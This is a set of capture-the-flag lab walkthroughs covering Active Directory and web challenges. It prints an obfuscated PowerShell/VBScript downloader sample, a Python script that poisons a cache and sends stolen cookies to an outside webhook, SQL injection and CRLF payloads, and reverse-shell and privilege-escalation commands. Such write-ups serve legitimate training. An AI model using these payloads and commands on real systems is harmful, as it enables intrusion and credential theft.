63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764

Now I remembered that John The Ripper has a function (ansible2john) from which we can crack these keys password which will be needed to decrypt these keys into plaintext

EXPLOITATION

So i saved each hash into different txt files so i have three different files, Now one by one

ansible2john ansible_hash_file_name > new_file_name

john --wordlist=rockyou.txt new_file_name

And after some time you will get the password that is required to crack the above ansible vault encoded keys and the password is same for all three keys above

Now we will save this password in a file named as pwd.txt and use ansible-vault tool which you can download using pip3 if you don’t have

pip3 ansible-vault --break-system-packages

Now go to the directory where you have your ansible vault encoded keys stored earlier not converted one the original one then do this

ansible-vault decrypt -v your-ansible-file --vault-password-file=pwd.txt

After decryption you will get your PWM Admin Password on the same file in which your key was stored

Now Login to PWM configuration Editor inside the website and go to LDAP Profile Enabled Option through Search Bar

Now there is a vulnerability known as LDAP Pass-Back Attack which is used to change the LDAP URL to attacker IP and LDAP PORT and On listening on the same port LDAP Back Passes the User Password which in this case is svc_ldap as you can see above in LDAP Proxy User
To Know More About This Vulnerability Read this ….

So Let’s change the LDAP URL’s default URL to

#on website
ldap://YOUR-MACHINE-IP:636

#on your machine
nc -lvnp 636

Now Click On Test LDAP Profile and head to your listener and wait !!

And you will successfully get the password for svc_ldap user . Now Let’s check if it is valid or not for a shell

USER FLAG

So as you see it is valid and we got our user flag

PRIVELEGE ESCALATION

Now I remembered seeing ADCS directory inside Ansible directory so let’s quickly check for any ADCS vulnerability using Certipy (ensure you are using latest one)

certipy find -u svc_ldap@authority.htb -p 'REDACTED' -dc-ip 10.129.47.203 -vulnerable -stdout

And we found it there is ESC1 vulnerability

Understanding the vulnerability

Wanted Alive

MOHIT SINGH PAPOLA — Sat, 27 Dec 2025 10:32:27 GMT

OVERVIEW

So we are given file to download and an instance to spawn Let’s do it and see what’s inside the zip
So we found a wanted.hta file let’s see its file type and its contents

Its a HTML document with ASCII text which is very long so when i inspected the file contents it looked like URL encoded so let’s drop the whole file in Cyberchef Tool Online

Use the import file button to import the file and then click on the magic wand beside the Output Heading to decode the content
So as you can see we got the decoded content but there are too much whitespace inside it let’s use the remove whitespace recipe in cyberchef to remove it

so we get the final script as

As you can see in the above script that

PowErShEll -ExBYPaSS -NOP -W 1 -C DEVIcEcrEDEnTIAlDePlOYmENt.EXe; iex($(iEX('[SYsTeM.TeXt.EnCoding]'[chAr]0X3A[CHAr]0X3A'uTf8.geTSTring([SYstem.ConVERT]'[chAR]58[CHAR]58'fRoMBASE64string(

It shows that the string inside that is base64encoded so let’s decode it in cyberchef so the base64encoded string is

JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly93YW50ZWQuYWxpdmUuaHRiLzM1L3dhbnRlZC50SUYiLCIkZU52OkFQUERBVEFcd2FudGVkLnZicyIsMCwwKTtTVEFSdC1zbGVlUCgzKTtzdEFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcd2FudGVkLnZicyI=

It successfully decoded and it points to Download File from http://wanted.alive.htb/35/wanted.tIF so let’s grab the wanted.tIF file real quick
NOTE: here for downloading the file, In place of http://wanted.alive.htb/ use the instance IP and Port If you are using Windows otherwise add the IP in /etc/hosts in Linux

So after visiting the URL above we can get the file now let’s inspect its content now using cat wanted.tIF

On inspecting the .tIF file you will find the below part of code in the middle

If Not mesor() Then

        On Error Resume Next

        latifoliado = "U2V0LUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVNjb3BlIFByb2Nlc3MgLUZvcmNlOyBbU3lzdGVtLk5ldC5TZd2FudGVkCgXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sgPSB7JHRydWV9O1td2FudGVkCgTe"
        latifoliado = latifoliado & "XN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW1N5c3RlbS5OZXQuU2Vydmld2FudGVkCgjZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgLWJvciAzMDcyOyBpZXggKFtTeXN0ZW0uVGV4dC5FbmNvZd2FudGVkCgGl"
        latifoliado = latifoliado & "uZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKG5ldy1vYmplY3Qgcd2FudGVkCg3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd2FudGVkLmFsaXZlLmh0Yi9jZGJhL19d2FudGVkCgyc"
        latifoliado = latifoliado & "CcpKSkpd2FudGVkCgd2FudGVkCg"

        Dim parrana
        parrana = "d2FudGVkCg"

        Dim arran
        arran =" d2FudGVkCg  d2FudGVkCg "
        arran = arran & "$d2FudGVkCgCod2FudGVkCgd"
        arran = arran & "id2FudGVkCggod2FudGVkCg "
        arran = arran & "d2FudGVkCg" & latifoliado & "d2FudGVkCg"
        arran = arran & "$d2FudGVkCgOWd2FudGVkCgj"
        arran = arran & "ud2FudGVkCgxdd2FudGVkCg "
        arran = arran & "=d2FudGVkCg [d2FudGVkCgs"
        arran = arran & "yd2FudGVkCgstd2FudGVkCge"
        arran = arran & "md2FudGVkCg.Td2FudGVkCge"
        arran = arran & "xd2FudGVkCgt.d2FudGVkCge"
        arran = arran & "nd2FudGVkCgcod2FudGVkCgd"
        arran = arran & "id2FudGVkCgngd2FudGVkCg]"
        arran = arran & ":d2FudGVkCg:Ud2FudGVkCgT"
        arran = arran & "Fd2FudGVkCg8.d2FudGVkCgG"
        arran = arran & "ed2FudGVkCgtSd2FudGVkCgt"
        arran = arran & "rd2FudGVkCgind2FudGVkCgg"
        arran = arran & "(d2FudGVkCg[sd2FudGVkCgy"
        arran = arran & "sd2FudGVkCgted2FudGVkCgm"
        arran = arran & ".d2FudGVkCgCod2FudGVkCgn"
        arran = arran & "vd2FudGVkCgerd2FudGVkCgt"
        arran = arran & "]d2FudGVkCg::d2FudGVkCgF"
        arran = arran & "rd2FudGVkCgomd2FudGVkCgb"
        arran = arran & "ad2FudGVkCgsed2FudGVkCg6"
        arran = arran & "4d2FudGVkCgStd2FudGVkCgr"
        arran = arran & "id2FudGVkCgngd2FudGVkCg("
        arran = arran & "$d2FudGVkCgcod2FudGVkCgd"
        arran = arran & "id2FudGVkCggod2FudGVkCg)"
        arran = arran & ")d2FudGVkCg;pd2FudGVkCgo"
        arran = arran & "wd2FudGVkCgerd2FudGVkCgs"
        arran = arran & "hd2FudGVkCgeld2FudGVkCgl"
        arran = arran & ".d2FudGVkCgexd2FudGVkCge"
        arran = arran & " d2FudGVkCg-wd2FudGVkCgi"
        arran = arran & "nd2FudGVkCgdod2FudGVkCgw"
        arran = arran & "sd2FudGVkCgtyd2FudGVkCgl"
        arran = arran & "ed2FudGVkCg hd2FudGVkCgi"
        arran = arran & "dd2FudGVkCgded2FudGVkCgn"
        arran = arran & " d2FudGVkCg-ed2FudGVkCgx"
        arran = arran & "ed2FudGVkCgcud2FudGVkCgt"
        arran = arran & "id2FudGVkCgond2FudGVkCgp"
        arran = arran & "od2FudGVkCglid2FudGVkCgc"
        arran = arran & "yd2FudGVkCg bd2FudGVkCgy"
        arran = arran & "pd2FudGVkCgasd2FudGVkCgs"
        arran = arran & " d2FudGVkCg-Nd2FudGVkCgo"
        arran = arran & "Pd2FudGVkCgrod2FudGVkCgf"
        arran = arran & "id2FudGVkCgled2FudGVkCg "
        arran = arran & "-d2FudGVkCgcod2FudGVkCgm"
        arran = arran & "md2FudGVkCgand2FudGVkCgd"
        arran = arran & " d2FudGVkCg$Od2FudGVkCgW"
        arran = arran & "jd2FudGVkCguxd2FudGVkCgD"
        arran = descortinar(arran, parrana, "")

        Dim sandareso
        sandareso = "pd2FudGVkCgo"
        sandareso = sandareso & "wd2FudGVkCgr"
        sandareso = sandareso & "sd2FudGVkCge"
        sandareso = sandareso & "ld2FudGVkCgl -cd2FudGVkCgommad2FudGVkCgnd "
        sandareso = descortinar(sandareso, parrana, "")

        sandareso = sandareso & arran

        Dim incentiva
        Set incentiva = CreateObject("WScript.Shell")
        incentiva.Run sandareso, 0, False 
        WScript.Quit(rumbo)

End If

At first glance, it looked like random garbage, but on closer inspection it was base64 sprinkled with noise markers (the string d2FudGVkCg).
These markers were intentionally inserted to break up the first four line base64 encoded payload and prevent direct decoding, The VBScript logic was essentially concatenating these fragments into a single base64 string, then passing it to a decoding function.

To recover the real payload manually, I Collected all the fragments into one string, Removed every occurrence of the marker d2FudGVkCg and made sure the result was valid base64 and decoded it. This process can be easily reproduced in CyberChef by using Find&Replace (replace d2FudGVkCg with nothing) followed by a From Base64 operation.

So you can either do it using Find / Replace But I prefer Manual Way to avoid any problem
So the string we got after cleaning is

U2V0LUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVNjb3BlIFByb2Nlc3MgLUZvcmNlOyBbU3lzdGVtLk5ldC5TZd2FudGVkCgXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sgPSB7JHRydWV9O1td2FudGVkCgTeXN0ZW0uTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW1N5c3RlbS5OZXQuU2Vydmld2FudGVkCgjZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgLWJvciAzMDcyOyBpZXggKFtTeXN0ZW0uVGV4dC5FbmNvZd2FudGVkCgGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKG5ldy1vYmplY3Qgcd2FudGVkCg3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd2FudGVkLmFsaXZlLmh0Yi9jZGJhL19d2FudGVkCgycCcpKSkpd2FudGVkCgd2FudGVkCg

Now we have to remove the string that is setted to avoid direct decoding which is d2FudGVkCg
We can use Cyberchef for it

Now we got the decoded message in which it is pointing towards another web address let’s visit that

And BOOM! we got our Flag!!!

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

VulnCicada

MOHIT SINGH PAPOLA — Thu, 25 Dec 2025 10:11:25 GMT

OVERVIEW

So we have given IP address of the machine so Let’s head to Nmap to scan this IP

ENUMERATION

So these are the ports open and domain and domain controller name Be sure to add these into /etc/hosts

So Port 2049 caught my eye which has nfs service opened so i quickly performed

showmount -e 10.129.234.48

It showed /profiles directory so let’s mount it using mount

mkdir /mnt/profiles
mount -t nfs 10.129.234.48:/profiles /mnt/profiles

After it gets mounted lets head to /mnt/profiles and enumerate further

We found 14 user directories in which only Administrator and Rosie.Powell has some files so let’s copy those two user directories to somewhere else to see the files more thoroughly

On Inspecting Administrator Directory we found

Let’s check out vacation.png and other files too

Doesn’t seemed to have any information nor in image or in other files , So let’s check Rosie.Powell user directory now

It also have an image named as marketing.png so let’s open the image and check out other files too

While other files didn’t gave any info the marketing.png image revealed a password like string Cicada123

EXPLOITATION

Now we have user and a password let’s try another services such as SMB, LDAP, WEB, RDP etc

On checking Website on port 80 we found nothing else then IIS Window Web Server and a non accessible /CertEnroll directory So Now Let’s move to Other Services.

We realized that SMB,NTLM has disabled so there is no other way rather then Kerberos authentication so let’s do that with the help of -k flag

nxc smb 10.129.234.48 -u Rosie.Powell -p Cicada123 -k

So we can see we can now do SMB assigning and can access shares So I saw a share named as CertEnroll which we saw during our web enumeration so as the name is it suggest towards ADCS (Active Directory Certificate Services) so Let’s run Certipy to see any vulnerable templates are there or not.

First Let’s grab the ticket of Rosie.Powell user so that Kerberos authentication will be easier in future For this we can use impacket-GetTGT

Now lets run Certipy but before that change your /etc/krb5.conf file to the following one because we are using Kerberos authentication so its good to change it to avoid any issues

[libdefaults]
    default_realm = CICADA.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    CICADA.VL = {
        kdc = 10.129.234.48
        admin_server = 10.129.234.48
    }

[domain_realm]
    .cicada.vl = CICADA.VL
    cicada.vl = CICADA.VL

certipy find -vulnerable -u Rosie.Powell@cicada.vl -dc-ip 10.129.234.48 -dc-host DC-JPQ225.cicada.vl -k -no-pass -stdout

NOTE: If you are running Certipy in virtual environment then you have to check the ticket using klist to ensure the ticket is there if it says no valid ticket then export the ticket again inside the virtual environment

Here we go we found out ESC8 Vulnerability as Web Enrollment is enabled over HTTP

So what is ESC8 Let’s see something about it

ESC8 – NTLM Relay on AD CS Web Enrolment

Breach

MOHIT SINGH PAPOLA — Wed, 24 Dec 2025 06:09:09 GMT

OVERVIEW

So we are given the machine IP and told that the user flag is in C:\share\transfer . Let’s scan the machine for open ports and services using Nmap

ENUMERATION

So As you can see many ports are open and we also got the Domain Name and Domain Controller also so update this information in /etc/hosts

Let’s first check SMB shares:

Since we have not gotten the username and password we will try with Guest/Anonymous Login
I am using smbmap you can use netexec also

We found 3 shares in which we have Read Access to Two shares and READ,WRITE access to one share.

Lets check out share using smbclient

On accessing share we found three directories in which two are empty and when we go to the transfer directories then there are 3 more user directories whose listing file permission is denied .

Since we have Read and Write access on share we can steal NTLM creds by uploading the file in the share using smbclient

GETTING NTLM HASH

For this I am using ntlm _theft tool to generate the files.

So we will use the icon file and move it to the directory where you will use smbclient from do change the icon file name to shell.url for readability.

First Turn On The Responder on another terminal using

sudo responder -I tun0 -wdv

Now Login to Smbclient again and go to transfer directory and put the shell.url inside it and wait for 2 minutes and you will get the NTLM hash of Julia.Wong user

Now save the hash in the hash.txt and use John The Ripper to crack the hash to get the password using rockyou.txt wordlist.

Now check if its valid or not using netexec

It is valid

USER FLAG

Now you can get your user.txt from the C:\share\transfer using smbclient and logined as Julia.Wong

EXPLOITATION

Now As we got a valid user password so we can run Bloodhound to visualize relationships between the users, OU, groups etc

bloodhound-python -u 'julia.wong' -p 'JULIA-PASS' -d breach.vl -ns 10.129.13.42 -c ALL --zip

Now While doing enumeration in Bloodhound we find that there is one other kerberoastable account beside krbtgt which is svc_mssql

While Seeing The Node Info of svc_mssql we find that its Admin Count=False which means we can create its ticket to impersonate high privileged user but first let’s find its password .

Since it is a Kerberoastable account we can use NetExec to get its hash and then crack it OR you can use Impacket-GetUserSPNs query.

Crack the hash using John The Ripper and get the password for svc_mssql and now verify it

Now we got the password for svc_mssql let’s move on to the impersonation of high privileged user using ticketer.py of Impacket

ticketer.py -user svc_mssql -nthash NT-HASH -domain breach.vl -domain-sid DOMAIN-SID -spn SPN administrator

Replace NT-HASH by the hash which you will get by converting the svc_mssql password using this website
https://hashes.com/en/generate/hash

Replace DOMAIN-SID and SPN from the Bloodhound svc_mssql node info.

export KRB5CCNAME=administrator.ccache

Now we can enable xp cmdshell and use it to execute a reverse shell to get shell as breach\svc_mssql

enable_xp_cmdshell

xp_cmdshell powershell-base64-rev-shell-payload

Use the reverse shell payload from https://www.revshells.com/ and start the listener

PRIVILEGE ESCALATION / ROOT FLAG

Lets see what privileges the user got

As you can see we have SeImpersonatePrivilege Enabled
So we can use GodPotato and SweetPotato

Use python server using

python3 -m http.server 8000

Now Import it into the shell using iwr in C:\Users\svc_mssql\Documents

iwr http://YOUR-IP:PORT/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe

Now run

.\GodPotato-NET4.exe -cmd 'powershell-revshell-base64-cmd'               #be sure to change the port

Now See In your Listener you will get the shell as NT Authority\system and then get the root flag

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

OmniWatch

MOHIT SINGH PAPOLA — Sun, 19 Oct 2025 16:20:55 GMT

OVERVIEW

So we have given Some Files To Download and Instance . So Let’s start the instance and also view the source code or the data we are given

So In the website we can see there is a authentication/login feature

So Since we don’t have Username and Password So let’s check the files we had downloaded

We have a web app consisting of 2 services, one written in Zig using the http.zig framework and one written in Python using the Flask framework.

They both sit behind a varnish cache, and a MySQL database is used for storing data. The oracle service is used for fetching location by providing the id of a device.

The controller service requires authentication and is used to browse tracking device data as well as browsing firmware updates.

CRLF injection in http.zig

Let's have a closer look on the oracle function of the main.zig service

fn oracle(req: *httpz.Request, res: *httpz.Response) !void {
    var gpa = std.heap.GeneralPurposeAllocator(.{}){};
    const allocator = gpa.allocator();

    const deviceId = req.param("deviceId").?;
    const mode = req.param("mode").?;
    const decodedDeviceId = try std.Uri.unescapeString(allocator, deviceId);
    const decodedMode = try std.Uri.unescapeString(allocator, mode);

    const latitude = try randomCoordinates();
    const longtitude = try randomCoordinates();

    res.header("X-Content-Type-Options", "nosniff");
    res.header("X-XSS-Protection", "1; mode=block");
    res.header("DeviceId", decodedDeviceId);

    if (std.mem.eql(u8, decodedMode, "json")) {
        try res.json(.{ .lat = latitude, .lon = longtitude }, .{});
    } else {
        const htmlTemplate =
            \\
            \\
            \\    
            \\        </span><span class="hljs-attribute">Device</span> Oracle API v<span class="hljs-number">2</span>.<span class="hljs-number">6</span>
            \\    
            \\
            \\    Mode: {s}
Lat: {s}
Lon: {s}
            \\
            \\
        ;

        res.body = try std.fmt.allocPrint(res.arena, htmlTemplate, .{ decodedMode, latitude, longtitude });
    }
}

The deviceId and mode variables are URL-decoded and stored into two variables (decodedDeviceId, decodedMode).

If decodedMode is equal to json, a JSON response with the random coordinates is returned.

Else an HTML string is created containing decodedMode and the random coordinates. This looks like a possible XSS vector but because the X-Content-Type-Options header is set to nosniff and no Content-Type header is set the browser does not "sniff" the content type or render this response as HTML.

By searching the issues of the http.zig library we find a closed issue explaining a CRLF injection bug. All route parameters are vulnerable to CRLF injection, so we can use this to inject arbitrary headers like the Content-Type header we needed to cause XSS.

Even though this was patched we can deduct that our app since is vulnerable it's using a static version of http.zig without importing it with the help of any package manager, and if we check the signatures of the files at challenge/oracle/modules we will see they match the ones before the patch commits were made on GitHub.

So Let’s Try XSS with the URL encoded payloads on /oracle/

http://94.237.57.1:52049/oracle/%3Cscript%3Ealert%280%29%3C%2Fscript%3E/1%0D%0AContent-Type%3A%20text%2Fhtml

Basically the URL decoded payloads are

/oracle//1\r\nContent-Type: text/html

Got the XSS payload working which means it is a successful CRLF Injection attack

Varnish Cache Poisoning

Great now we can cause XSS, but how can we weaponize that? Let's have a closer look at config/cache.vcl

sub vcl_backend_response {
    if (beresp.http.CacheKey == "enable") {
        set beresp.ttl = 10s;
        set beresp.http.Cache-Control = "public, max-age=10";
    } else {
        set beresp.ttl = 0s;
        set beresp.http.Cache-Control = "public, max-age=0";
    }
 }

At the CacheKey header is checked for the value vcl_backend_response subroutine, which is used to forward the response from the backed to the client, the enabled . If this header is sent from the backend the response is cached for 10 seconds.

 sub vcl_hash {
    hash_data(req.http.CacheKey);
    return (lookup);
 }

The In this instance only the vcl_hash is used to join the components of which varnish creates the hash that identifies clients.
CacheKey header is used for this, we can abuse this to cause cache poisoning since we can inject arbitrary headers.

If we inject the arbitrary Content-Type or X-Content-Type-Options header alongside the enabled header and the XSS payload in the CacheKey = mode parameter varnish will cache the malicious response for 10 seconds, so after this any user visiting that endpoint will receive the cached response, this happens because headers by themselves are not supposed to be used as hash_data

So, we can now cause the cache poisoning + XSS

Race Condition In The Chromium Bot

We can try and use what we found to attack the bot that runs every 0.5 minutes but this does not work. If we poison the cache with the following payload:

We receive a request with no cookies provided because in bot’s code

client.get("http://127.0.0.1:1337/controller/login")
 time.sleep(3)

 client.find_element(By.ID, "username").send_keys(config["MODERATOR_USER"])
 client.find_element(By.ID, "password").send_keys(config["MODERATOR_PASSWORD"])
 client.execute_script("document.getElementById('login-btn').click()")
 time.sleep(3)

 client.get(f"http://127.0.0.1:1337/oracle/json/{str(random.randint(1, 15))}")
 time.sleep(10)

Here we can see that the bot first visits the login page, waits 3 seconds, logs in using the credentials, waits another 3 seconds and then visits a random device on the oracle service.

So if we poison the cache before the user logs in there are no cookies to steal yet, and because the bot gets our cached response there are no inputs and buttons to interact with so the login step fails completely. We have to time the poisoning of the cache accurately after the login step but not after the bot visits the oracle.

Thankfully there is the /controller/bot_running endpoint which gives us the status of the bot, so we can estimate to poison the cache about 3 seconds after the bot has started.

So use the below script to get the moderator JWT token

import requests
import urllib.parse
import time
import multiprocessing
from flask import Flask, request

# Configuration
CHALLENGE_URL = "http://xx.xx.xx.xx:xxxx"
EXFIL_URL = "YOUR_WEBHOOK_PUBLIC_LINK"  # Webhoook 

def start_server():
    app = Flask(__name__)

    @app.route("/exfiltrate", methods=["GET"])
    def index():
        cookies = request.args.get("cookies", "No cookies received")
        print("Leaked cookies:", cookies)
        # Save cookies to a file for persistence
        with open("exfiltrated_cookies.txt", "a") as f:
            f.write(f"{time.strftime('%Y-%m-%d %H:%M:%S')} - {cookies}\n")
        return "ok", 200

    app.run(host=EXFIL_URL, debug=False)

def url_encode(string):
    return urllib.parse.quote(string, safe="")

def check_bot():
    try:
        resp = requests.get(f"{CHALLENGE_URL}/controller/bot_running", timeout=5)
        print(f"Bot check status: {resp.text}")
        return resp.text == "running"
    except requests.RequestException as e:
        print(f"Error checking bot: {e}")
        return False

def poison_cache():
    if not check_bot():
        print("Bot not running, skipping cache poison attempt")
        return False
    time.sleep(3)

    xss = f""
    encoded_xss = url_encode(xss)
    injected_headers = "\r\nCacheKey: enable\r\nX-Content-Type-Options: undefined"
    encoded_headers = url_encode(injected_headers)

    try:
        final_url = f"{CHALLENGE_URL}/oracle/{encoded_xss}/1{encoded_headers}"
        print(f"Sending request to: {final_url}")
        response = requests.get(final_url, timeout=5)
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text[:500]}")  # Truncate for readability
        return True
    except requests.RequestException as e:
        print(f"Error in poison_cache: {e}")
        return False

def poison_loop():
    while True:
        poison_cache()
        time.sleep(1)

if __name__ == "__main__":
    server = multiprocessing.Process(target=start_server)
    poison = multiprocessing.Process(target=poison_loop)
    server.start()
    poison.start()

In CHALLENGE_URL use the challenge URL given and for webhook link you can go to webhook.site
(Use VPN if your site is not opening)

then run this python code and wait for the bot to poison the cache

Here we go Now go to your webhook.site again to see the request

We got our cookie , Now Copy paste this cookie in the cookies of website and access /controller/admin

We successfully got entered in Admin Dashboard Now Let’s check other things out like Firmware etc

So Navigating to /controller/firmware reveals to us a firmware update page. There are two selections of firmware files we can preview.

On seeing the firmware section in routes.py

@web.route("/firmware", methods=["GET", "POST"])
@moderator_middleware
def firmware():
    if request.method == "GET":
        patches_avaliable = ["CyberSpecter_v1.5_config.json", "StealthPatch_v2.0_config.json"]
        return render_template("firmware.html", user_data=request.user_data, nav_enabled=True, title="OmniWatch - Firmware", patches=patches_avaliable)

    if request.method == "POST":
        patch = request.form.get("patch")

        if not patch:
            return response("Missing parameters"), 400

        file_data = open(os.path.join(os.getcwd(), "application", "firmware", patch)).read()
        return file_data, 200

We notice that the file to preview is provided as a post parameter coming from the front-end. The Python os.path.join method is used to build the absolute path of the file to be read.

This is vulnerable to LFI since removes the first section of the path if the later one is an absolute path

Let’s capture the preview firmware request inside Burpsuite to apply the LFI
(Don’t mind the host IP as Mine Instance got closed so I started it again and got new IP)

So change the patch = /app/jwt_secret.txt we got from challenge/controller/application/util/config.py

And by this we got our jwt_secret by which we could create new jwt token

Now head to online python jwt compiler to make new jwt with the below script

import jwt
payload = {
 "user_id": 1,
 "username": "reapsec", #name of your choice
 "account_type": "administrator"
 }
secret="YOUR_SECRET"  #add your own
print(jwt.encode(payload, secret, algorithm="HS256"))

And you will get your new jwt token

Remember the authentication middleware implements tamper protection so even if we generate a new JWT using the leaked secret we still won't be able to log in.
The only way this can be bypassed is if we could insert our own signature in the database.

SQLi To Insert Arbitrary Signatures

@web.route("/device/", methods=["GET"])
@moderator_middleware
def device(id):
    mysql_interface = MysqlInterface(current_app.config)
    device = mysql_interface.fetch_device(id)

    if not device:
        return redirect("/controller/home")

    return render_template("device.html", user_data=request.user_data, nav_enabled=True, title=f"OmniWatch - Device {device['device_id']}", device=device)

At the /controller/device/ route an instance of MysqlInterface is created which then calls the method fetch_device with the provided id as it's parameter.

By having a look at challenge/controller/application/util/database we discover that this query is vulnerable to SQL injection.

Let’s create URL encoded SQLi Payloads to enter in /device/{id}

NOTE: DON’T FORGET TO ADD SPACE AFTER EACH PAYLOAD SUCH THAT YOUR PAYLOAD SHOULD END WITH A SPACE OR %20 IN URL ENCODING

First Let’s check whether multi-statement execution is allowed

1' OR '1'='1'; SELECT SLEEP(3); --

Use CyberChef to URL encode this payload with all special characters and put it after /controller/device/{id}

Since it perfectly executed it means multiline statement is allowed so we can stack an UPDATE after a SELECT

Now take the signature of the new JWT token you created above and convert it into hex using cyberchef again and put 0x in front of it

FOR EXAMPLE: (yours will be different)

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6InJlYXBzZWMiLCJhY2NvdW50X3R5cGUiOiJhZG1pbmlzdHJhdG9yIn0.OajF7Qjvy2CmC6VuBBYxP1H9YEy51SsTGVpnN8Gl5e4

This is my own jwt token which i created using above script now i am taking its signature (means third part among three parts divided by . )

OajF7Qjvy2CmC6VuBBYxP1H9YEy51SsTGVpnN8Gl5e4

Now head to Cyberchef and convert it into hex and put 0x in front of it

So the final signature will be

0x4f616a4637516a767932436d43365675424259785031483959457935315373544756706e4e38476c356534

#ABOVE WAS JUST AN EXAMPLE YOUR VALUES WILL BE DIFFERENT

Now let’s create a final payload to add our signature in the database to bypass the authentication

1' OR '1'='1' LIMIT 1; UPDATE signatures SET signature = YOUR_SIGNATURE WHERE user_id = 1; --

(don’t forget to check the space after the payload and be sure that your URL encoded payload ends with %20 )

URL ENCODE THIS PAYLOAD IN CYBERCHEF

Now put this payload same as before in place of id in /controller/device/id

If it shows no error that means it is added in the database

Now quickly copy your new jwt which you had created from above script and now change it in the cookies of this website and then go to /controller/admin

And we will get the Flag !!

NOTE:

If you don’t see flag check your payload once again and now do it from webhook step again like use that jwt you got in webhook to go to admin dashboard and you already have the secret and custom jwt you created so no need to do that again so just enter the signature payload once again , don’t enter the multiline checking payload this time and then change the jwt in cookies with your custom made and again try accessing /controller/admin and you will get the flag.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

FOR FULL DETAILS ABOUT VULNERABILITY AND THE CHALLENGE PLEASE CHECK OUT OFFICIAL WALKTHROUGH OF HACK THE BOX

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

BabyTwo

MOHIT SINGH PAPOLA — Mon, 13 Oct 2025 17:35:23 GMT

OVERVIEW

So we have given IP address of the machine so Let’s head to Nmap to scan this IP

As you can see we came to found the open ports and machine host name and its DC name So add both of them into /etc/hosts

So As we don’t have user password lets just try using guest login as guest as username and empty password

nxc smb #MACHINE_IP -u guest -p ''

Here we go guest is allowed to access SMB server so Now let’s use smbmap to access the shares:

smbmap -H 10.129.179.22 -u guest -p ''

And we can see there is a share named as homes which guest user have READ,WRITE access

So Let’s access the share using smbclient

smbclient -U 'guest%' '//baby2.vl/homes'

We successfully got the access to the share and in that we can see there is a list of users so we can just save the users into a file

Now Since we have users but don’t have their password so there is a slight chance that some of the users are using their name as both USERNAME and PASSWORD
So let’s check it by spraying their username and password with the name of the users we got using netexec

nxc smb 10.129.179.22 -u users.txt -p users.txt --no-bruteforce --continue-on-success

Got two users who has set their username as their password so Now Let’s Access the shares using any of the user using smbmap again

we got READ and WRITE access on docs and apps shares

So let’s check it out:

When I checked It is empty so let’s check SYSVOL share too

I saw login.vbs file so let’s see what it consist of

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    

    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
